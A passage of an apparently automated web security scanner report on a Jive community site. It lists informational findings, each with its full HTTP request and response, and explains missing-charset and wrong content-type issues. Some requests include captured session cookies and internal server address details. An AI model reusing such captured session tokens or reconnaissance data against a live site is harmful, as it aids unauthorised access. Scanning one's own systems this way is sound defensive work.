Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.46. https://www.x.com/people/hotellina

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.47. https://www.x.com/people/iConcessionStand

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.48. https://www.x.com/people/joncas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.49. https://www.x.com/people/lwhite2104

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.50. https://www.x.com/people/mandeheritage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.51. https://www.x.com/people/odeskdev

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.52. https://www.x.com/people/omuleanu

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.53. https://www.x.com/people/pluto26

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.54. https://www.x.com/people/posiden5665

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.55. https://www.x.com/people/ramonmorales123

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132323335343b332c3133343430323b332c34383739343b332c3134303635343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.56. https://www.x.com/people/rizkygarut

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.57. https://www.x.com/people/roguereptile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.58. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.59. https://www.x.com/people/sebastian.kopp@wooga.com

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.60. https://www.x.com/people/skier

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.61. https://www.x.com/resources/scripts/fancyzoom/images/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/fancyzoom/images/

Request

GET /resources/scripts/fancyzoom/images/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 0
JP: D=1433 t=1313157093676141
Cache-Control: max-age=2016000, public
Vary: User-Agent
Connection: close


11.62. https://www.x.com/resources/scripts/tiny_mce3

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/tiny_mce3

Request

GET /resources/scripts/tiny_mce3 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:33 GMT
Server: Apache-Coyote/1.1
Content-Type: application/octet-stream
Content-Length: 353
JP: D=2144 t=1313157093566199
Vary: User-Agent
Connection: close

classes
langs
license.txt
plugins
themes
tiny_mce_dev.js
tiny_mce_dev-min.js
tiny_mce_gzip.js
tiny_mce_gzip-min.js
tiny_mce_init.js
tiny_mce_init-min.js
tiny_mce_jquery.js
tiny_mce_jquery-min.js
tiny_
...[SNIP]...

11.63. https://www.x.com/servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf

Request

GET /servlet/JiveServlet/download/1052-1-1034/pp_dev_Datasheet_API_R3.pdf HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:44 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:34:56 GMT
Etag: "3.0.7-167309"
Content-disposition: attachment
Pragma: expires
Cache-Control: private
Content-Type: application/pdf
Content-Length: 167309
JP: D=3016 t=1313156384521909
Vary: User-Agent
Connection: close

%PDF-1.4%....
7 0 obj<</Linearized 1/L 167309/O 9/E 123864/N 2/T 167128/H [ 1436 300]>>endobj xref7 570000000016 00000 n
0000001736 00000 n
0000001832 00000 n
0000002405 000
...[SNIP]...

11.64. https://www.x.com/servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf

Request

GET /servlet/JiveServlet/download/1481-1-1070/pp_dev_Datasheet_PPX_R3.pdf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:45 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:39:41 GMT
Etag: "3.0.7-193831"
Content-disposition: attachment
Pragma: expires
Cache-Control: private
Content-Type: application/pdf
Content-Length: 193831
JP: D=2254 t=1313157225870164
Vary: User-Agent
Connection: close

%PDF-1.4%....
9 0 obj<</Linearized 1/L 193831/O 11/E 124255/N 2/T 193610/H [ 1436 301]>>endobj xref9 570000000016 00000 n
0000001737 00000 n
0000001834 00000 n
0000002408 000
...[SNIP]...

11.65. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

Request

GET /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:29 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:50 GMT
Cache-Control: max-age=60
Content-Type: text/html
Content-Length: 196
JP: D=290 t=1313114370000022
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive

<html><head><title>Jive SBS</title></head>
<body><font face="arial,helvetica,sans-serif">
<b>Error</b><br><font size="-1">
The requested document could not be loaded.
</font></font></body></html>

11.66. https://www.x.com/tags

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /tags

Request

GET /tags HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=270750 t=1313157263884148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

11.67. https://www.x.com/themes/paypal/images/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /themes/paypal/images/favicon.ico

Request

GET /themes/paypal/images/favicon.ico HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:28 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 09:46:36 GMT
Etag: "3.0.7-d941befcecba314c9b3d6f0aeeb3fc0c-3638"-gzip
Content-Type: application/octet-stream
Vary: Accept-Encoding,User-Agent
JP: D=1499 t=1313114368699966
Content-Length: 3638
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive

...[SNIP]...

11.68. https://www.x.com/threads

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /threads

Request

GET /threads HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: User-Agent
JP: D=399265 t=1313157098002095
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

12. HTML does not specify charset
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


12.1. https://www.x.com/dwr/interface

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /dwr/interface

Request

GET /dwr/interface HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 12 Aug 2011 13:53:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Vary: User-Agent
JP: D=3397 t=1313157225958050
Connection: close


<html>
<head>
<title>The page can't be found (404)</title>

<style type="text/css">
body {
background-color: #e3e3e3;
color: #333;
font-family: Lucida Grande, Arial, Helvetica, sans-
...[SNIP]...

12.2. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

Request

GET /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:29 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:50 GMT
Cache-Control: max-age=60
Content-Type: text/html
Content-Length: 196
JP: D=290 t=1313114370000022
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive

<html><head><title>Jive SBS</title></head>
<body><font face="arial,helvetica,sans-serif">
<b>Error</b><br><font size="-1">
The requested document could not be loaded.
</font></font></body></html>

13. Content type incorrectly stated
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


13.1. https://www.x.com/dwr/interface/Clearvote.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.x.com
Path:   /dwr/interface/Clearvote.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/Clearvote.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
